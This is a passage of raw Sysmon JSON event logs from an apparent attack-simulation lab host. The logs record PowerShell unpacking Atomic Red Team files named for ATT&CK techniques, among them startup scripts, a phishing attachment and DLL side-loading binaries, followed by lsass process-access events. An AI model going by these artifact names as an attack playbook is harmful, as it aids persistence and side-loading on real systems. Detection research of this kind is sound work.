05:52:34.077","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:52:34.077","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.011\\bin\\AtomicTest.exe","CreationUtcTime":"2020-08-01 05:52:34.077","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4755,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:34.109\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\bin\\T1546.015x64.dll\r\nCreationUtcTime: 2020-08-01 05:52:34.109","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:34.109","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\bin\\T1546.015x64.dll","CreationUtcTime":"2020-08-01 05:52:34.109","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4756,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:34.109\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\atomicNotepad.sln\r\nCreationUtcTime: 2020-08-01 05:52:34.109","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:34.109","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\atomicNotepad.sln","CreationUtcTime":"2020-08-01 05:52:34.109","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4757,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:34.109\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\atomicNotepad\\atomicNotepad.vcxproj\r\nCreationUtcTime: 2020-08-01 05:52:34.109","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:34.109","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\atomicNotepad\\atomicNotepad.vcxproj","CreationUtcTime":"2020-08-01 05:52:34.109","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4758,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:34.124\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\x64\\Release\\atomicNotepad.dll\r\nCreationUtcTime: 2020-08-01 05:52:34.124","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:34.124","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1546.015\\src\\x64\\Release\\atomicNotepad.dll","CreationUtcTime":"2020-08-01 05:52:34.124","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4759,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:34.140\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\batstartup.bat\r\nCreationUtcTime: 2020-08-01 05:52:34.140","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:34.140","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\batstartup.bat","CreationUtcTime":"2020-08-01 05:52:34.140","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4760,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:34.140\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\jsestartup.jse\r\nCreationUtcTime: 2020-08-01 05:52:34.140","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:34.140","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\jsestartup.jse","CreationUtcTime":"2020-08-01 05:52:34.140","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4761,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:34.140\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\vbsstartup.vbs\r\nCreationUtcTime: 2020-08-01 05:52:34.140","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:34.140","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1547.001\\src\\vbsstartup.vbs","CreationUtcTime":"2020-08-01 05:52:34.140","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4762,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:34.281\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1559.002\\src\\PowerShell_Script_For_DDE_Document.ps1\r\nCreationUtcTime: 2020-08-01 05:52:34.281","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:34.281","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1559.002\\src\\PowerShell_Script_For_DDE_Document.ps1","CreationUtcTime":"2020-08-01 05:52:34.281","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4763,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:34.327\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1564.004\\src\\test.ps1\r\nCreationUtcTime: 2020-08-01 05:52:34.327","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:34.327","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1564.004\\src\\test.ps1","CreationUtcTime":"2020-08-01 05:52:34.327","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4764,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:34.327\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1566.001\\bin\\PhishingAttachment.xlsm\r\nCreationUtcTime: 2020-08-01 05:52:34.327","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:34.327","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1566.001\\bin\\PhishingAttachment.xlsm","CreationUtcTime":"2020-08-01 05:52:34.327","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4765,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:52:34.359\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.002\\bin\\GUP.exe\r\nCreationUtcTime: 2020-08-01 05:52:34.359","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:52:34.359","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.002\\bin\\GUP.exe","CreationUtcTime":"2020-08-01 05:52:34.359","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4766,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:34.374\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.002\\bin\\libcurl.dll\r\nCreationUtcTime: 2020-08-01 05:52:34.374","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:34.374","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.002\\bin\\libcurl.dll","CreationUtcTime":"2020-08-01 05:52:34.374","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4767,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:52:34.390\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.009\\bin\\WindowsServiceExample.exe\r\nCreationUtcTime: 2020-08-01 05:52:34.390","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:52:34.390","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1574.009\\bin\\WindowsServiceExample.exe","CreationUtcTime":"2020-08-01 05:52:34.390","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4768,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.390\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.390","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4769,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.390\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.390","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4770,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.390\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 